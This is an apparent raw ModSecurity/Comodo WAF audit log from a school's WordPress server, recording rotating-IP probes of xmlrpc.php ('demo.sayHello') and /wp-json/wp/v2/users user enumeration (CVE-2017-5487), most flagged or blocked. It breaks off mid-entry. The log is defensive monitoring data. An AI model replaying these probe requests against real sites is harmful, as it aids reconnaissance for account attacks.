--d0708424-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.201.11.12 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.11.12 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d0708424-C-- demo.sayHello --d0708424-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d0708424-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747440929199541 5815 (- - -) Stopwatch2: 1747440929199541 5815; combined=4170, p1=549, p2=3409, p3=29, p4=31, p5=91, sr=75, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d0708424-Z-- --d5922037-A-- [17/May/2025:07:15:33 +0700] aCfVJXyxdQCiyU1ENFcmrgAAAAQ 103.236.140.4 42544 103.236.140.4 8181 --d5922037-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.183.51 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.183.51 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d5922037-C-- demo.sayHello --d5922037-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d5922037-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747440933468461 5649 (- - -) Stopwatch2: 1747440933468461 5649; combined=4155, p1=545, p2=3387, p3=32, p4=36, p5=92, sr=75, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d5922037-Z-- --fb6f7942-A-- [17/May/2025:07:15:34 +0700] aCfVJnyxdQCiyU1ENFcmrwAAAAU 103.236.140.4 42546 103.236.140.4 8181 --fb6f7942-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.112.75 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.112.75 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --fb6f7942-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fb6f7942-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747440934923766 1990 (- - -) Stopwatch2: 1747440934923766 1990; combined=1008, p1=325, p2=656, p3=0, p4=0, p5=26, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fb6f7942-Z-- --c414ee2f-A-- [17/May/2025:07:15:39 +0700] aCfVK-m4kjNN-hEbWjJArAAAAE0 103.236.140.4 42552 103.236.140.4 8181 --c414ee2f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.112.75 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.112.75 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c414ee2f-C-- demo.sayHello --c414ee2f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c414ee2f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747440939388245 5434 (- - -) Stopwatch2: 1747440939388245 5434; combined=4092, p1=516, p2=3237, p3=34, p4=29, p5=181, sr=119, sw=95, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c414ee2f-Z-- --15d52f2c-A-- [17/May/2025:07:15:46 +0700] aCfVMnyxdQCiyU1ENFcmsgAAAAo 103.236.140.4 42556 103.236.140.4 8181 --15d52f2c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.93.48 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.93.48 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --15d52f2c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --15d52f2c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747440946045929 3189 (- - -) Stopwatch2: 1747440946045929 3189; combined=1431, p1=493, p2=905, p3=0, p4=0, p5=32, sr=91, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --15d52f2c-Z-- --bae88b01-A-- [17/May/2025:07:15:54 +0700] aCfVOum4kjNN-hEbWjJArQAAAE4 103.236.140.4 42560 103.236.140.4 8181 --bae88b01-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.93.48 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.93.48 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --bae88b01-C-- demo.sayHello --bae88b01-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --bae88b01-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747440954674482 5886 (- - -) Stopwatch2: 1747440954674482 5886; combined=4205, p1=541, p2=3495, p3=24, p4=27, p5=69, sr=78, sw=49, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bae88b01-Z-- --62a83b6f-A-- [17/May/2025:07:16:04 +0700] aCfVRHyxdQCiyU1ENFcmtQAAABA 103.236.140.4 42564 103.236.140.4 8181 --62a83b6f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.165.97 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.165.97 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --62a83b6f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --62a83b6f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747440964202700 3497 (- - -) Stopwatch2: 1747440964202700 3497; combined=1477, p1=503, p2=941, p3=0, p4=0, p5=32, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --62a83b6f-Z-- --a4550217-A-- [17/May/2025:07:16:11 +0700] aCfVS3yxdQCiyU1ENFcmtwAAAA8 103.236.140.4 42568 103.236.140.4 8181 --a4550217-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.165.97 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.165.97 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a4550217-C-- demo.sayHello --a4550217-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a4550217-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747440971916659 4646 (- - -) Stopwatch2: 1747440971916659 4646; combined=3632, p1=429, p2=3006, p3=23, p4=24, p5=88, sr=65, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a4550217-Z-- --15284f55-A-- [17/May/2025:07:16:16 +0700] aCfVUHyxdQCiyU1ENFcmuQAAABQ 103.236.140.4 42572 103.236.140.4 8181 --15284f55-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.77.167 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.77.167 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --15284f55-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --15284f55-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747440976773408 3276 (- - -) Stopwatch2: 1747440976773408 3276; combined=1385, p1=474, p2=880, p3=0, p4=0, p5=31, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --15284f55-Z-- --b09a0a3f-A-- [17/May/2025:07:16:20 +0700] aCfVVHyxdQCiyU1ENFcmugAAABU 103.236.140.4 42574 103.236.140.4 8181 --b09a0a3f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.182.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.182.222 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b09a0a3f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b09a0a3f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747440980276368 2069 (- - -) Stopwatch2: 1747440980276368 2069; combined=968, p1=336, p2=605, p3=0, p4=0, p5=27, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b09a0a3f-Z-- --90215007-A-- [17/May/2025:07:16:22 +0700] aCfVVnyxdQCiyU1ENFcmvAAAABg 103.236.140.4 42582 103.236.140.4 8181 --90215007-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.13.3 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.13.3 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --90215007-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --90215007-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747440982426071 3077 (- - -) Stopwatch2: 1747440982426071 3077; combined=1310, p1=422, p2=858, p3=0, p4=0, p5=30, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --90215007-Z-- --06e94f12-A-- [17/May/2025:07:16:23 +0700] aCfVV3yxdQCiyU1ENFcmvQAAAAA 103.236.140.4 42586 103.236.140.4 8181 --06e94f12-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.77.167 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.77.167 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --06e94f12-C-- demo.sayHello --06e94f12-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --06e94f12-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747440983959220 4639 (- - -) Stopwatch2: 1747440983959220 4639; combined=3603, p1=427, p2=2981, p3=23, p4=24, p5=87, sr=66, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --06e94f12-Z-- --42c0332c-A-- [17/May/2025:07:16:25 +0700] aCfVWXyxdQCiyU1ENFcmwAAAAAI 103.236.140.4 42592 103.236.140.4 8181 --42c0332c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.182.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.182.222 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --42c0332c-C-- demo.sayHello --42c0332c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --42c0332c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747440985633480 4623 (- - -) Stopwatch2: 1747440985633480 4623; combined=3600, p1=433, p2=2967, p3=24, p4=26, p5=88, sr=66, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --42c0332c-Z-- --cda52f78-A-- [17/May/2025:07:16:28 +0700] aCfVXHyxdQCiyU1ENFcmwQAAAAM 103.236.140.4 42596 103.236.140.4 8181 --cda52f78-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.240.99.156 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.240.99.156 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --cda52f78-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cda52f78-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747440988694795 2569 (- - -) Stopwatch2: 1747440988694795 2569; combined=1224, p1=412, p2=784, p3=0, p4=0, p5=28, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cda52f78-Z-- --a0da2326-A-- [17/May/2025:07:16:28 +0700] aCfVXATOsBn9MSWb6WJt4wAAAIs 103.236.140.4 42598 103.236.140.4 8181 --a0da2326-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.13.3 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.13.3 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a0da2326-C-- demo.sayHello --a0da2326-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a0da2326-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747440988699286 17322 (- - -) Stopwatch2: 1747440988699286 17322; combined=28751, p1=425, p2=3170, p3=28, p4=31, p5=12566, sr=66, sw=81, l=0, gc=12450 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a0da2326-Z-- --acb21d7d-A-- [17/May/2025:07:16:35 +0700] aCfVY3yxdQCiyU1ENFcmwwAAAAg 103.236.140.4 42606 103.236.140.4 8181 --acb21d7d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.240.99.156 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.240.99.156 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --acb21d7d-C-- demo.sayHello --acb21d7d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --acb21d7d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747440995380472 4020 (- - -) Stopwatch2: 1747440995380472 4020; combined=3153, p1=384, p2=2601, p3=20, p4=19, p5=76, sr=57, sw=53, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --acb21d7d-Z-- --eb49aa2c-A-- [17/May/2025:07:17:09 +0700] aCfVhQTOsBn9MSWb6WJt5QAAAIw 103.236.140.4 42610 103.236.140.4 8181 --eb49aa2c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.92.4 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.92.4 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --eb49aa2c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eb49aa2c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747441029448141 3028 (- - -) Stopwatch2: 1747441029448141 3028; combined=1278, p1=434, p2=815, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0 Producer: 